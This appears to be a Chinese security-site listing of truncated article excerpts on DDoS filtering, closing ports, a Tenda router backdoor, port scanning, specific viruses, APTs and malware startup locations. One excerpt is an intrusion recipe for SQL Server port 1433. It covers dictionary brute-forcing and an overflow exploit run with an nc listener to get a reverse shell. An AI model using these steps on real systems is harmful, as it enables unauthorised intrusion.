1、路由器被DDoS攻击可以参照RFC 2267，使用访问控制列表（ACL）过滤进出报文参考以下例子： {ISP中心} -- ISP端边界路由器 -- 客户端边界路由器 -- {客户端网络} ISP端边界路由器应该只接受源地址属于客户端网络的通信，而客户端网络则应该只接受源地址未被...

进程解说：在开机第一次启动QQ的时候，会加载一个TXPlatform进程，目的是为了避免同时登陆两个相同的QQ号码。QQ2011、QQ2012里面的QQExternal.exe是外部应用相关进程，QQ2008版本之前的QQExternal.exe是广告相关进程。 这两个文件到底是做什么用的，其实已经...

公开于因特网上的服务器基本上不使用RPC。如前所述，尽管危险性比公司内部环境低，但只要不运行使用DCOM的特定应用程序（只要不是必须的服务），就应该关闭135端口。比如只是作为Web服务器、邮件或DNS服务器来使用的话，即便关闭135端口，也不会出现任何问题...

一直有人认为D-Link是唯一的将在其产品中放置后门供应商，其实这里还有一个供应商也同样在产品中放置了后门，并且可以利用单个UDP数据包就搞定。她就是腾达。 腾达W302R无线路由器的最新固件解压后，我开始寻找基于GoAheadWeb服务器指向的/bin/httpd，腾达做...

A. 发现内部用户使用地址扫描软件扫描 Internet 【地址/端口扫描软件】在使用此类软件时，软件会在单位时间向目标地址或者目标网段发出大量的ICMP/UDP包或者TCP连接，以扫描目标地址是否存在或者是否有开放的端口。使用这些软件的客户端会发出很大的数据流量...

TCP connect() 扫描 这是最基本的 TCP扫描。操作系统提供的connect()系统调用，用来与每一个感兴趣的目标计算机的端口进行连接。如果端口处于侦听状态，那么connect()就能成功。否则，这个端口是不能用的，即没有提供服务。这个技术的一个最大的优点是，你不...

近期，一种可以穿透还原软件与硬件还原卡的机器狗病毒异常肆虐。此病毒通过pcihdd.sys驱动文件抢占还原软件的硬盘控制权。并修改用户初始化文件userinit.exe来实现隐藏自身的目的。此病毒为一个典型的网络架构木马型病毒，病毒穿透还原软件后将自己保存在系...

与传统网络攻击相比，黑客所发动的APTs(高级持续性威胁)是一个新兴的攻击类型。APTs会给企业和网络带来持续不断的威胁，能够发动APTs攻击的黑客，往往是一个有着良好纪律性的组织，作为一个专业团队集中进行网络活动。通常情况下，他们将宝贵的知识产权、机...

1. 1433端口入侵 scanport.exe 查有1433的机器 SQLScanPass.exe 进行字典暴破（字典是关键） 最后 SQLTools.exe入侵 对sql的sp2及以下的系统，可用sql的hello 溢出漏洞入侵。 nc -vv -l -p 本机端口 sqlhelloF.exe 入侵ip 1433 本机ip 本机端口 （以上反向的...

有病毒，随后就出现了杀软。今天给大家分享下Windows系统中病毒的藏身之处，好让大家以后直接揪出内鬼。 1、一般的病毒在开机时启动双进程坚守、关闭杀毒程序。HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run是否有陌生启动项。这里属于常规启动项，很...